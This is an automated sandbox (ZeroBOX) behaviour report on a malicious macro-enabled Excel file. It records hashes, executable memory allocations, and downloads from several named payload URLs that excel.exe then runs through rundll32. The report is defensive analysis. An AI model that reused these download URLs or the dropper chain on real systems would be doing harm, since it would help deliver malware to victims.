Summary | ZeroBOX

catalog-651041236.xlsm

Category Machine Started Completed
FILE s1_win7_x3201 April 16, 2021, 9:53 a.m. April 16, 2021, 9:56 a.m.
Size 120.1KB
Type Microsoft Excel 2007+
MD5 eedd85d33f91ca72acae1df084d2d373
SHA256 11c2a7e630ebef5d29c6a30c94d882fb7d1b39903499b5d9a32ef0d7822f1c1a
CRC32 4008FCED
ssdeep 3072:uOKybaf6JMcuaNB19ofM1xjy/YD6GQ8cl:uc2f6Jzuu9oM1lyu7Qnl
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
204.11.58.33 Active Moloch
34.95.253.189 Active Moloch
75.119.136.137 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x776ed08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x776e964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x776d4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x776d6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x776de825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x776d6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x776d5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x776d49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x776d5a20
RtlClearBits+0x2d8 TpCheckTerminateWorker-0x1a ntdll+0x5d700 @ 0x77aed700
LdrShutdownProcess+0x97 RtlSubtreePredecessor-0x503 ntdll+0x5e449 @ 0x77aee449
RtlExitUserProcess+0x74 RtlDetectHeapLeaks-0x4e ntdll+0x5e19f @ 0x77aee19f
ExitProcess+0x15 TerminateThread-0x143 kernel32+0x52164 @ 0x762e2164
rundll32+0x135c @ 0xb2135c
rundll32+0x1901 @ 0xb21901
BaseThreadInitThunk+0x12 SetUnhandledExceptionFilter-0xbc kernel32+0x53c45 @ 0x762e3c45
RtlInitializeExceptionChain+0xef RtlFreeSid-0x117 ntdll+0x637f5 @ 0x77af37f5
RtlInitializeExceptionChain+0xc2 RtlFreeSid-0x144 ntdll+0x637c8 @ 0x77af37c8

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x77703ef4
registers.esp: 1111472
registers.edi: 0
registers.eax: 10788440
registers.ebp: 1111500
registers.edx: 1
registers.ebx: 0
registers.esi: 2474960
registers.ecx: 1936537052
1 0 0

__exception__

stacktrace:
CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x776ed08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x776e964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x776d4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x776d6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x776de825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x776d6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x776d5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x776d49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x776d5a20
RtlClearBits+0x2d8 TpCheckTerminateWorker-0x1a ntdll+0x5d700 @ 0x77aed700
LdrShutdownProcess+0x97 RtlSubtreePredecessor-0x503 ntdll+0x5e449 @ 0x77aee449
RtlExitUserProcess+0x74 RtlDetectHeapLeaks-0x4e ntdll+0x5e19f @ 0x77aee19f
ExitProcess+0x15 TerminateThread-0x143 kernel32+0x52164 @ 0x762e2164
rundll32+0x135c @ 0xb2135c
rundll32+0x1901 @ 0xb21901
BaseThreadInitThunk+0x12 SetUnhandledExceptionFilter-0xbc kernel32+0x53c45 @ 0x762e3c45
RtlInitializeExceptionChain+0xef RtlFreeSid-0x117 ntdll+0x637f5 @ 0x77af37f5
RtlInitializeExceptionChain+0xc2 RtlFreeSid-0x144 ntdll+0x637c8 @ 0x77af37c8

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x77703ef4
registers.esp: 2357792
registers.edi: 0
registers.eax: 11640408
registers.ebp: 2357820
registers.edx: 1
registers.ebx: 0
registers.esi: 3589072
registers.ecx: 1936537052
1 0 0
request GET http://boehm-kavon15lc.ru.com/body.html
request GET http://rosenbaum-milan15y.ru.com/body.html
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b021000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b07f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b07f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6be41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6be41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x77791000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x77121000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x772d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75c61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75621000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71cb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71ca1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75301000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6532
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6532
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6532
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6532
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05990000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\Administrator\AppData\Local\Temp\~$catalog-651041236.xlsm
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003b4
filepath: C:\Users\Administrator\AppData\Local\Temp\~$catalog-651041236.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\ADMINI~1\AppData\Local\Temp\~$catalog-651041236.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://boehm-kavon15lc.ru.com/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue1
filepath: C:\Users\Administrator\ghnrope.rue1
1 0 0

URLDownloadToFileW

url: http://rosenbaum-milan15y.ru.com/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue2
filepath: C:\Users\Administrator\ghnrope.rue2
1 0 0

URLDownloadToFileW

url: https://glsiba.org/drms/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue3
filepath: C:\Users\Administrator\ghnrope.rue3
2148270088 0

URLDownloadToFileW

url: https://jahthroneafricancrafts.com/drms/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue4
filepath: C:\Users\Administrator\ghnrope.rue4
2148270088 0
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue3,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue2,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue4,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue1,DllRegisterServer